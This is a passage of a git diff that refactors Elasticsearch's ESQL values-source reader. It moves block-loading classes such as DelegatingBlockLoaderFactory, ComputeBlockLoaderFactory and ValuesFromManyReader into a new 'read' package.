BlockLoader.Docs docs) throws IOException { - int firstDoc = docs.get(0); - positionFieldWork(shard, segment, firstDoc); - StoredFieldsSpec storedFieldsSpec = StoredFieldsSpec.NO_REQUIREMENTS; - List rowStrideReaders = new ArrayList<>(fields.length); - LeafReaderContext ctx = ctx(shard, segment); - try (ComputeBlockLoaderFactory loaderBlockFactory = new ComputeBlockLoaderFactory(blockFactory, docs.count())) { - for (int f = 0; f < fields.length; f++) { - FieldWork field = fields[f]; - BlockLoader.ColumnAtATimeReader columnAtATime = field.columnAtATime(ctx); - if (columnAtATime != null) { - blocks[f] = (Block) columnAtATime.read(loaderBlockFactory, docs); - sanityCheckBlock(columnAtATime, docs.count(), blocks[f], f); - } else { - rowStrideReaders.add( - new RowStrideReaderWork( - field.rowStride(ctx), - (Block.Builder) field.loader.builder(loaderBlockFactory, docs.count()), - field.loader, - f - ) - ); - storedFieldsSpec = storedFieldsSpec.merge(field.loader.rowStrideStoredFieldSpec()); - } - } - - SourceLoader sourceLoader = null; - ShardContext shardContext = shardContexts.get(shard); - if (storedFieldsSpec.requiresSource()) { - sourceLoader = shardContext.newSourceLoader.get(); - storedFieldsSpec = storedFieldsSpec.merge(new StoredFieldsSpec(true, false, sourceLoader.requiredStoredFields())); - } - - if (rowStrideReaders.isEmpty()) { - return; - } - if (storedFieldsSpec.equals(StoredFieldsSpec.NO_REQUIREMENTS)) { - throw new IllegalStateException( - "found row stride readers [" + rowStrideReaders + "] without stored fields [" + storedFieldsSpec + "]" - ); - } - StoredFieldLoader storedFieldLoader; - if (useSequentialStoredFieldsReader(docs, shardContext.storedFieldsSequentialProportion())) { - storedFieldLoader = StoredFieldLoader.fromSpecSequential(storedFieldsSpec); - trackStoredFields(storedFieldsSpec, true); - } else { - storedFieldLoader = StoredFieldLoader.fromSpec(storedFieldsSpec); - trackStoredFields(storedFieldsSpec, false); - } - BlockLoaderStoredFieldsFromLeafLoader storedFields = new BlockLoaderStoredFieldsFromLeafLoader( - storedFieldLoader.getLoader(ctx, null), - sourceLoader != null ? sourceLoader.leaf(ctx.reader(), null) : null - ); - for (int p = 0; p < docs.count(); p++) { - int doc = docs.get(p); - storedFields.advanceTo(doc); - for (RowStrideReaderWork work : rowStrideReaders) { - work.read(doc, storedFields); - } - } - for (RowStrideReaderWork work : rowStrideReaders) { - blocks[work.offset] = work.build(); - sanityCheckBlock(work.reader, docs.count(), blocks[work.offset], work.offset); - } - } finally { - Releasables.close(rowStrideReaders); - } - } - - private void loadFromSingleLeafUnsorted(Block[] blocks, DocVector docVector) throws IOException { - IntVector docs = docVector.docs(); - int[] forwards = docVector.shardSegmentDocMapForwards(); - int shard = docVector.shards().getInt(0); - int segment = docVector.segments().getInt(0); - loadFromSingleLeaf(blocks, shard, segment, new BlockLoader.Docs() { - @Override - public int count() { - return docs.getPositionCount(); - } - - @Override - public int get(int i) { - return docs.getInt(forwards[i]); - } - }); - final int[] backwards = docVector.shardSegmentDocMapBackwards(); - for (int i = 0; i < blocks.length; i++) { - Block in = blocks[i]; - blocks[i] = in.filter(backwards); - in.close(); - } - } - - private class LoadFromMany implements Releasable { - private final Block[] target; - private final IntVector shards; - private final IntVector segments; - private final IntVector docs; - private final int[] forwards; - private final int[] backwards; - private final Block.Builder[][] builders; - private final BlockLoader[][] converters; - private final Block.Builder[] fieldTypeBuilders; - private final BlockLoader.RowStrideReader[] rowStride; - - BlockLoaderStoredFieldsFromLeafLoader storedFields; - - LoadFromMany(Block[] target, DocVector docVector) { - this.target = target; - shards = docVector.shards(); - segments = docVector.segments(); - docs = docVector.docs(); - forwards = docVector.shardSegmentDocMapForwards(); - backwards = docVector.shardSegmentDocMapBackwards(); - fieldTypeBuilders = new Block.Builder[target.length]; - builders = new Block.Builder[target.length][shardContexts.size()]; - converters = new BlockLoader[target.length][shardContexts.size()]; - rowStride = new BlockLoader.RowStrideReader[target.length]; - } - - void run() throws IOException { - for (int f = 0; f < fields.length; f++) { - /* - * Important note: each field has a desired type, which might not match the mapped type (in the case of union-types). - * We create the final block builders using the desired type, one for each field, but then also use inner builders - * (one for each field and shard), and converters (again one for each field and shard) to actually perform the field - * loading in a way that is correct for the mapped field type, and then convert between that type and the desired type. - */ - fieldTypeBuilders[f] = fields[f].info.type.newBlockBuilder(docs.getPositionCount(), blockFactory); - builders[f] = new Block.Builder[shardContexts.size()]; - converters[f] = new BlockLoader[shardContexts.size()]; - } - try (ComputeBlockLoaderFactory loaderBlockFactory = new ComputeBlockLoaderFactory(blockFactory, docs.getPositionCount())) { - int p = forwards[0]; - int shard = shards.getInt(p); - int segment = segments.getInt(p); - int firstDoc = docs.getInt(p); - positionFieldWork(shard, segment, firstDoc); - LeafReaderContext ctx = ctx(shard, segment); - fieldsMoved(ctx, shard); - verifyBuilders(loaderBlockFactory, shard); - read(firstDoc, shard); - for (int i = 1; i < forwards.length; i++) { - p = forwards[i]; - shard = shards.getInt(p); - segment = segments.getInt(p); - boolean changedSegment = positionFieldWorkDocGuarteedAscending(shard, segment); - if (changedSegment) { - ctx = ctx(shard, segment); - fieldsMoved(ctx, shard); - } - verifyBuilders(loaderBlockFactory, shard); - read(docs.getInt(p), shard); - } - } - for (int f = 0; f < target.length; f++) { - for (int s = 0; s < shardContexts.size(); s++) { - if (builders[f][s] != null) { - try (Block orig = (Block) converters[f][s].convert(builders[f][s].build())) { - fieldTypeBuilders[f].copyFrom(orig, 0, orig.getPositionCount()); - } - } - } - try (Block targetBlock = fieldTypeBuilders[f].build()) { - target[f] = targetBlock.filter(backwards); - } - sanityCheckBlock(rowStride[f], docs.getPositionCount(), target[f], f); - } - } - - private void fieldsMoved(LeafReaderContext ctx, int shard) throws IOException { - StoredFieldsSpec storedFieldsSpec = StoredFieldsSpec.NO_REQUIREMENTS; - for (int f = 0; f < fields.length; f++) { - FieldWork field = fields[f]; - rowStride[f] = field.rowStride(ctx); - storedFieldsSpec = storedFieldsSpec.merge(field.loader.rowStrideStoredFieldSpec()); - } - SourceLoader sourceLoader = null; - if (storedFieldsSpec.requiresSource()) { - sourceLoader = shardContexts.get(shard).newSourceLoader.get(); - storedFieldsSpec = storedFieldsSpec.merge(new StoredFieldsSpec(true, false, sourceLoader.requiredStoredFields())); - } - storedFields = new BlockLoaderStoredFieldsFromLeafLoader( - StoredFieldLoader.fromSpec(storedFieldsSpec).getLoader(ctx, null), - sourceLoader != null ? sourceLoader.leaf(ctx.reader(), null) : null - ); - if (false == storedFieldsSpec.equals(StoredFieldsSpec.NO_REQUIREMENTS)) { - trackStoredFields(storedFieldsSpec, false); - } - } - - private void verifyBuilders(ComputeBlockLoaderFactory loaderBlockFactory, int shard) { - for (int f = 0; f < fields.length; f++) { - if (builders[f][shard] == null) { - // Note that this relies on field.newShard() to set the loader and converter correctly for the current shard - builders[f][shard] = (Block.Builder) fields[f].loader.builder(loaderBlockFactory, docs.getPositionCount()); - converters[f][shard] = fields[f].loader; - } - } - } - - private void read(int doc, int shard) throws IOException { - storedFields.advanceTo(doc); - for (int f = 0; f < builders.length; f++) { - rowStride[f].read(doc, storedFields, builders[f][shard]); - } - } - - @Override - public void close() { - Releasables.closeExpectNoException(fieldTypeBuilders); - for (int f = 0; f < fields.length; f++) { - Releasables.closeExpectNoException(builders[f]); - } - } - } - - /** - * Is it more efficient to use a sequential stored field reader - * when reading stored fields for the documents contained in {@code docIds}? - */ - private boolean useSequentialStoredFieldsReader(BlockLoader.Docs docs, double storedFieldsSequentialProportion) { - int count = docs.count(); - if (count < SEQUENTIAL_BOUNDARY) { - return false; - } - int range = docs.get(count - 1) - docs.get(0); - return range * storedFieldsSequentialProportion <= count; - } - - private void trackStoredFields(StoredFieldsSpec spec, boolean sequential) { - readersBuilt.merge( - "stored_fields[" - + "requires_source:" - + spec.requiresSource() - + ", fields:" - + spec.requiredStoredFields().size() - + ", sequential: " - + sequential - + "]", - 1, - (prev, one) -> prev + one - ); - } - - private class FieldWork { - final FieldInfo info; - - BlockLoader loader; - BlockLoader.ColumnAtATimeReader columnAtATime; - BlockLoader.RowStrideReader rowStride; - - FieldWork(FieldInfo info) { - this.info = info; - } - - void sameSegment(int firstDoc) { - if (columnAtATime != null && columnAtATime.canReuse(firstDoc) == false) { - columnAtATime = null; - } - if (rowStride != null && rowStride.canReuse(firstDoc) == false) { - rowStride = null; - } - } - - void sameShardNewSegment() { - columnAtATime = null; - rowStride = null; - } - - void newShard(int shard) { - loader = info.blockLoader.apply(shard); - columnAtATime = null; - rowStride = null; - } - - BlockLoader.ColumnAtATimeReader columnAtATime(LeafReaderContext ctx) throws IOException { - if (columnAtATime == null) { - columnAtATime = loader.columnAtATimeReader(ctx); - trackReader("column_at_a_time", this.columnAtATime); - } - return columnAtATime; - } - - BlockLoader.RowStrideReader rowStride(LeafReaderContext ctx) throws IOException { - if (rowStride == null) { - rowStride = loader.rowStrideReader(ctx); - trackReader("row_stride", this.rowStride); - } - return rowStride; - } - - private void trackReader(String type, BlockLoader.Reader reader) { - readersBuilt.merge(info.name + ":" + type + ":" + reader, 1, (prev, one) -> prev + one); - } - } - - private record RowStrideReaderWork(BlockLoader.RowStrideReader reader, Block.Builder builder, BlockLoader loader, int offset) - implements - Releasable { - void read(int doc, BlockLoaderStoredFieldsFromLeafLoader storedFields) throws IOException { - reader.read(doc, storedFields, builder); - } - - Block build() { - return (Block) loader.convert(builder.build()); - } - - @Override - public void close() { - builder.close(); - } - } - - private LeafReaderContext ctx(int shard, int segment) { - return shardContexts.get(shard).reader().leaves().get(segment); - } - - @Override - public String toString() { - StringBuilder sb = new StringBuilder(); - sb.append("ValuesSourceReaderOperator[fields = ["); - if (fields.length < 10) { - boolean first = true; - for (FieldWork f : fields) { - if (first) { - first = false; - } else { - sb.append(", "); - } - sb.append(f.info.name); - } - } else { - sb.append(fields.length).append(" fields"); - } - return sb.append("]]").toString(); - } - - @Override - protected Status status(long processNanos, int pagesProcessed, long rowsReceived, long rowsEmitted) { - return new Status(new TreeMap<>(readersBuilt), processNanos, pagesProcessed, rowsReceived, rowsEmitted, valuesLoaded); - } - - /** - * Quick checks for on the loaded block to make sure it looks reasonable. - * @param loader the object that did the loading - we use it to make error messages if the block is busted - * @param expectedPositions how many positions the block should have - it's as many as the incoming {@link Page} has - * @param block the block to sanity check - * @param field offset into the {@link #fields} array for the block being loaded - */ - private void sanityCheckBlock(Object loader, int expectedPositions, Block block, int field) { - if (block.getPositionCount() != expectedPositions) { - throw new IllegalStateException( - sanityCheckBlockErrorPrefix(loader, block, field) - + " has [" - + block.getPositionCount() - + "] positions instead of [" - + expectedPositions - + "]" - ); - } - if (block.elementType() != ElementType.NULL && block.elementType() != fields[field].info.type) { - throw new IllegalStateException( - sanityCheckBlockErrorPrefix(loader, block, field) - + "'s element_type [" - + block.elementType() - + "] NOT IN (NULL, " - + fields[field].info.type - + ")" - ); - } - } - - private String sanityCheckBlockErrorPrefix(Object loader, Block block, int field) { - return fields[field].info.name + "[" + loader + "]: " + block; - } - - public static class Status extends AbstractPageMappingOperator.Status { - public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( - Operator.Status.class, - "values_source_reader", - Status::new - ); - - private final Map readersBuilt; - private final long valuesLoaded; - - Status( - Map readersBuilt, - long processNanos, - int pagesProcessed, - long rowsReceived, - long rowsEmitted, - long valuesLoaded - ) { - super(processNanos, pagesProcessed, rowsReceived, rowsEmitted); - this.readersBuilt = readersBuilt; - this.valuesLoaded = valuesLoaded; - } - - Status(StreamInput in) throws IOException { - super(in); - readersBuilt = in.readOrderedMap(StreamInput::readString, StreamInput::readVInt); - valuesLoaded = supportsValuesLoaded(in.getTransportVersion()) ? in.readVLong() : 0; - } - - @Override - public void writeTo(StreamOutput out) throws IOException { - super.writeTo(out); - out.writeMap(readersBuilt, StreamOutput::writeVInt); - if (supportsValuesLoaded(out.getTransportVersion())) { - out.writeVLong(valuesLoaded); - } - } - - private static boolean supportsValuesLoaded(TransportVersion version) { - return version.onOrAfter(ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED) - || version.isPatchFrom(ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19); - } - - @Override - public String getWriteableName() { - return ENTRY.name; - } - - public Map readersBuilt() { - return readersBuilt; - } - - @Override - public long valuesLoaded() { - return valuesLoaded; - } - - @Override - public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { - builder.startObject(); - builder.startObject("readers_built"); - for (Map.Entry e : readersBuilt.entrySet()) { - builder.field(e.getKey(), e.getValue()); - } - builder.endObject(); - builder.field("values_loaded", valuesLoaded); - innerToXContent(builder); - return builder.endObject(); - } - - @Override - public boolean equals(Object o) { - if (super.equals(o) == false) return false; - Status status = (Status) o; - return readersBuilt.equals(status.readersBuilt) && valuesLoaded == status.valuesLoaded; - } - - @Override - public int hashCode() { - return Objects.hash(super.hashCode(), readersBuilt, valuesLoaded); - } - - @Override - public String toString() { - return Strings.toString(this); - } - } - - private static class ComputeBlockLoaderFactory extends DelegatingBlockLoaderFactory implements Releasable { - private final int pageSize; - private Block nullBlock; - - private ComputeBlockLoaderFactory(BlockFactory factory, int pageSize) { - super(factory); - this.pageSize = pageSize; - } - - @Override - public Block constantNulls() { - if (nullBlock == null) { - nullBlock = factory.newConstantNullBlock(pageSize); - } - nullBlock.incRef(); - return nullBlock; - } - - @Override - public void close() { - if (nullBlock != null) { - nullBlock.close(); - } - } - - @Override - public BytesRefBlock constantBytes(BytesRef value) { - return factory.newConstantBytesRefBlockWith(value, pageSize); - } - } - - public abstract static class DelegatingBlockLoaderFactory implements BlockLoader.BlockFactory { - protected final BlockFactory factory; - - protected DelegatingBlockLoaderFactory(BlockFactory factory) { - this.factory = factory; - } - - @Override - public BlockLoader.BooleanBuilder booleansFromDocValues(int expectedCount) { - return factory.newBooleanBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); - } - - @Override - public BlockLoader.BooleanBuilder booleans(int expectedCount) { - return factory.newBooleanBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.BytesRefBuilder bytesRefsFromDocValues(int expectedCount) { - return factory.newBytesRefBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING); - } - - @Override - public BlockLoader.BytesRefBuilder bytesRefs(int expectedCount) { - return factory.newBytesRefBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.DoubleBuilder doublesFromDocValues(int expectedCount) { - return factory.newDoubleBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); - } - - @Override - public BlockLoader.DoubleBuilder doubles(int expectedCount) { - return factory.newDoubleBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.FloatBuilder denseVectors(int expectedVectorsCount, int dimensions) { - return factory.newFloatBlockBuilder(expectedVectorsCount * dimensions); - } - - @Override - public BlockLoader.IntBuilder intsFromDocValues(int expectedCount) { - return factory.newIntBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); - } - - @Override - public BlockLoader.IntBuilder ints(int expectedCount) { - return factory.newIntBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.LongBuilder longsFromDocValues(int expectedCount) { - return factory.newLongBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); - } - - @Override - public BlockLoader.LongBuilder longs(int expectedCount) { - return factory.newLongBlockBuilder(expectedCount); - } - - @Override - public BlockLoader.Builder nulls(int expectedCount) { - return ElementType.NULL.newBlockBuilder(expectedCount, factory); - } - - @Override - public BlockLoader.SingletonOrdinalsBuilder singletonOrdinalsBuilder(SortedDocValues ordinals, int count) { - return new SingletonOrdinalsBuilder(factory, ordinals, count); - } - - @Override - public BlockLoader.AggregateMetricDoubleBuilder aggregateMetricDoubleBuilder(int count) { - return factory.newAggregateMetricDoubleBlockBuilder(count); - } - } -} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ComputeBlockLoaderFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ComputeBlockLoaderFactory.java new file mode 100644 index 0000000000000..20e7ffc4ca2cb --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ComputeBlockLoaderFactory.java @@ -0,0 +1,43 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.util.BytesRef; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BlockFactory; +import org.elasticsearch.compute.data.BytesRefBlock; +import org.elasticsearch.core.Releasable; + +class ComputeBlockLoaderFactory extends DelegatingBlockLoaderFactory implements Releasable { + private Block nullBlock; + + ComputeBlockLoaderFactory(BlockFactory factory) { + super(factory); + } + + @Override + public Block constantNulls(int count) { + if (nullBlock == null) { + nullBlock = factory.newConstantNullBlock(count); + } + nullBlock.incRef(); + return nullBlock; + } + + @Override + public void close() { + if (nullBlock != null) { + nullBlock.close(); + } + } + + @Override + public BytesRefBlock constantBytes(BytesRef value, int count) { + return factory.newConstantBytesRefBlockWith(value, count); + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/DelegatingBlockLoaderFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/DelegatingBlockLoaderFactory.java new file mode 100644 index 0000000000000..8dc5b6cc43ecf --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/DelegatingBlockLoaderFactory.java @@ -0,0 +1,93 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.index.SortedDocValues; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BlockFactory; +import org.elasticsearch.compute.data.ElementType; +import org.elasticsearch.compute.data.SingletonOrdinalsBuilder; +import org.elasticsearch.index.mapper.BlockLoader; + +public abstract class DelegatingBlockLoaderFactory implements BlockLoader.BlockFactory { + protected final BlockFactory factory; + + protected DelegatingBlockLoaderFactory(BlockFactory factory) { + this.factory = factory; + } + + @Override + public BlockLoader.BooleanBuilder booleansFromDocValues(int expectedCount) { + return factory.newBooleanBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); + } + + @Override + public BlockLoader.BooleanBuilder booleans(int expectedCount) { + return factory.newBooleanBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.BytesRefBuilder bytesRefsFromDocValues(int expectedCount) { + return factory.newBytesRefBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.DEDUPLICATED_AND_SORTED_ASCENDING); + } + + @Override + public BlockLoader.BytesRefBuilder bytesRefs(int expectedCount) { + return factory.newBytesRefBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.DoubleBuilder doublesFromDocValues(int expectedCount) { + return factory.newDoubleBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); + } + + @Override + public BlockLoader.DoubleBuilder doubles(int expectedCount) { + return factory.newDoubleBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.FloatBuilder denseVectors(int expectedVectorsCount, int dimensions) { + return factory.newFloatBlockBuilder(expectedVectorsCount * dimensions); + } + + @Override + public BlockLoader.IntBuilder intsFromDocValues(int expectedCount) { + return factory.newIntBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); + } + + @Override + public BlockLoader.IntBuilder ints(int expectedCount) { + return factory.newIntBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.LongBuilder longsFromDocValues(int expectedCount) { + return factory.newLongBlockBuilder(expectedCount).mvOrdering(Block.MvOrdering.SORTED_ASCENDING); + } + + @Override + public BlockLoader.LongBuilder longs(int expectedCount) { + return factory.newLongBlockBuilder(expectedCount); + } + + @Override + public BlockLoader.Builder nulls(int expectedCount) { + return ElementType.NULL.newBlockBuilder(expectedCount, factory); + } + + @Override + public BlockLoader.SingletonOrdinalsBuilder singletonOrdinalsBuilder(SortedDocValues ordinals, int count) { + return new SingletonOrdinalsBuilder(factory, ordinals, count); + } + + @Override + public BlockLoader.AggregateMetricDoubleBuilder aggregateMetricDoubleBuilder(int count) { + return factory.newAggregateMetricDoubleBlockBuilder(count); + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesExtractFieldOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/TimeSeriesExtractFieldOperator.java similarity index 97% rename from x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesExtractFieldOperator.java rename to x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/TimeSeriesExtractFieldOperator.java index f535bc462fdfc..b5820929ba290 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesExtractFieldOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/TimeSeriesExtractFieldOperator.java @@ -5,7 +5,7 @@ * 2.0. */ -package org.elasticsearch.compute.lucene; +package org.elasticsearch.compute.lucene.read; import org.apache.lucene.index.IndexReader; import org.apache.lucene.index.LeafReaderContext; @@ -21,6 +21,7 @@ import org.elasticsearch.compute.data.OrdinalBytesRefBlock; import org.elasticsearch.compute.data.OrdinalBytesRefVector; import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.ShardContext; import org.elasticsearch.compute.operator.AbstractPageMappingOperator; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.compute.operator.Operator; @@ -191,18 +192,18 @@ public void close() { Releasables.close(fieldsReader, super::close); } - static class BlockLoaderFactory extends ValuesSourceReaderOperator.DelegatingBlockLoaderFactory { + static class BlockLoaderFactory extends DelegatingBlockLoaderFactory { BlockLoaderFactory(BlockFactory factory) { super(factory); } @Override - public BlockLoader.Block constantNulls() { + public BlockLoader.Block constantNulls(int count) { throw new UnsupportedOperationException("must not be used by column readers"); } @Override - public BlockLoader.Block constantBytes(BytesRef value) { + public BlockLoader.Block constantBytes(BytesRef value, int count) { throw new UnsupportedOperationException("must not be used by column readers"); } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromManyReader.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromManyReader.java new file mode 100644 index 0000000000000..6f00e97a1f9f2 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromManyReader.java @@ -0,0 +1,195 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.index.LeafReaderContext; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; +import org.elasticsearch.index.mapper.BlockLoader; +import org.elasticsearch.index.mapper.BlockLoaderStoredFieldsFromLeafLoader; +import org.elasticsearch.index.mapper.SourceLoader; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; +import org.elasticsearch.search.fetch.StoredFieldsSpec; + +import java.io.IOException; + +/** + * Loads values from a many leaves. Much less efficient than {@link ValuesFromSingleReader}. + */ +class ValuesFromManyReader extends ValuesReader { + private static final Logger log = LogManager.getLogger(ValuesFromManyReader.class); + + private final int[] forwards; + private final int[] backwards; + private final BlockLoader.RowStrideReader[] rowStride; + + private BlockLoaderStoredFieldsFromLeafLoader storedFields; + + ValuesFromManyReader(ValuesSourceReaderOperator operator, DocVector docs) { + super(operator, docs); + forwards = docs.shardSegmentDocMapForwards(); + backwards = docs.shardSegmentDocMapBackwards(); + rowStride = new BlockLoader.RowStrideReader[operator.fields.length]; + log.debug("initializing {} positions", docs.getPositionCount()); + } + + @Override + protected void load(Block[] target, int offset) throws IOException { + try (Run run = new Run(target)) { + run.run(offset); + } + } + + class Run implements Releasable { + private final Block[] target; + private final Block.Builder[][] builders; + private final BlockLoader[][] converters; + private final Block.Builder[] fieldTypeBuilders; + + Run(Block[] target) { + this.target = target; + fieldTypeBuilders = new Block.Builder[target.length]; + builders = new Block.Builder[target.length][operator.shardContexts.size()]; + converters = new BlockLoader[target.length][operator.shardContexts.size()]; + } + + void run(int offset) throws IOException { + assert offset == 0; // TODO allow non-0 offset to support splitting pages + for (int f = 0; f < operator.fields.length; f++) { + /* + * Important note: each field has a desired type, which might not match the mapped type (in the case of union-types). + * We create the final block builders using the desired type, one for each field, but then also use inner builders + * (one for each field and shard), and converters (again one for each field and shard) to actually perform the field + * loading in a way that is correct for the mapped field type, and then convert between that type and the desired type. + */ + fieldTypeBuilders[f] = operator.fields[f].info.type().newBlockBuilder(docs.getPositionCount(), operator.blockFactory); + builders[f] = new Block.Builder[operator.shardContexts.size()]; + converters[f] = new BlockLoader[operator.shardContexts.size()]; + } + try (ComputeBlockLoaderFactory loaderBlockFactory = new ComputeBlockLoaderFactory(operator.blockFactory)) { + int p = forwards[offset]; + int shard = docs.shards().getInt(p); + int segment = docs.segments().getInt(p); + int firstDoc = docs.docs().getInt(p); + operator.positionFieldWork(shard, segment, firstDoc); + LeafReaderContext ctx = operator.ctx(shard, segment); + fieldsMoved(ctx, shard); + verifyBuilders(loaderBlockFactory, shard); + read(firstDoc, shard); + + int i = offset + 1; + long estimated = estimatedRamBytesUsed(); + long dangerZoneBytes = Long.MAX_VALUE; // TODO danger_zone if ascending + while (i < forwards.length && estimated < dangerZoneBytes) { + p = forwards[i]; + shard = docs.shards().getInt(p); + segment = docs.segments().getInt(p); + boolean changedSegment = operator.positionFieldWorkDocGuaranteedAscending(shard, segment); + if (changedSegment) { + ctx = operator.ctx(shard, segment); + fieldsMoved(ctx, shard); + } + verifyBuilders(loaderBlockFactory, shard); + read(docs.docs().getInt(p), shard); + i++; + estimated = estimatedRamBytesUsed(); + log.trace("{}: bytes loaded {}/{}", p, estimated, dangerZoneBytes); + } + buildBlocks(); + if (log.isDebugEnabled()) { + long actual = 0; + for (Block b : target) { + actual += b.ramBytesUsed(); + } + log.debug("loaded {} positions total estimated/actual {}/{} bytes", p, estimated, actual); + } + } + } + + private void buildBlocks() { + for (int f = 0; f < target.length; f++) { + for (int s = 0; s < operator.shardContexts.size(); s++) { + if (builders[f][s] != null) { + try (Block orig = (Block) converters[f][s].convert(builders[f][s].build())) { + fieldTypeBuilders[f].copyFrom(orig, 0, orig.getPositionCount()); + } + } + } + try (Block targetBlock = fieldTypeBuilders[f].build()) { + target[f] = targetBlock.filter(backwards); + } + operator.sanityCheckBlock(rowStride[f], backwards.length, target[f], f); + } + if (target[0].getPositionCount() != docs.getPositionCount()) { + throw new IllegalStateException("partial pages not yet supported"); + } + } + + private void verifyBuilders(ComputeBlockLoaderFactory loaderBlockFactory, int shard) { + for (int f = 0; f < operator.fields.length; f++) { + if (builders[f][shard] == null) { + // Note that this relies on field.newShard() to set the loader and converter correctly for the current shard + builders[f][shard] = (Block.Builder) operator.fields[f].loader.builder(loaderBlockFactory, docs.getPositionCount()); + converters[f][shard] = operator.fields[f].loader; + } + } + } + + private void read(int doc, int shard) throws IOException { + storedFields.advanceTo(doc); + for (int f = 0; f < builders.length; f++) { + rowStride[f].read(doc, storedFields, builders[f][shard]); + } + } + + @Override + public void close() { + Releasables.closeExpectNoException(fieldTypeBuilders); + for (int f = 0; f < operator.fields.length; f++) { + Releasables.closeExpectNoException(builders[f]); + } + } + + private long estimatedRamBytesUsed() { + long estimated = 0; + for (Block.Builder[] builders : this.builders) { + for (Block.Builder builder : builders) { + if (builder != null) { + estimated += builder.estimatedBytes(); + } + } + } + return estimated; + } + } + + private void fieldsMoved(LeafReaderContext ctx, int shard) throws IOException { + StoredFieldsSpec storedFieldsSpec = StoredFieldsSpec.NO_REQUIREMENTS; + for (int f = 0; f < operator.fields.length; f++) { + ValuesSourceReaderOperator.FieldWork field = operator.fields[f]; + rowStride[f] = field.rowStride(ctx); + storedFieldsSpec = storedFieldsSpec.merge(field.loader.rowStrideStoredFieldSpec()); + } + SourceLoader sourceLoader = null; + if (storedFieldsSpec.requiresSource()) { + sourceLoader = operator.shardContexts.get(shard).newSourceLoader().get(); + storedFieldsSpec = storedFieldsSpec.merge(new StoredFieldsSpec(true, false, sourceLoader.requiredStoredFields())); + } + storedFields = new BlockLoaderStoredFieldsFromLeafLoader( + StoredFieldLoader.fromSpec(storedFieldsSpec).getLoader(ctx, null), + sourceLoader != null ? sourceLoader.leaf(ctx.reader(), null) : null + ); + if (false == storedFieldsSpec.equals(StoredFieldsSpec.NO_REQUIREMENTS)) { + operator.trackStoredFields(storedFieldsSpec, false); + } + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromSingleReader.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromSingleReader.java new file mode 100644 index 0000000000000..d47a015c24578 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromSingleReader.java @@ -0,0 +1,238 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under 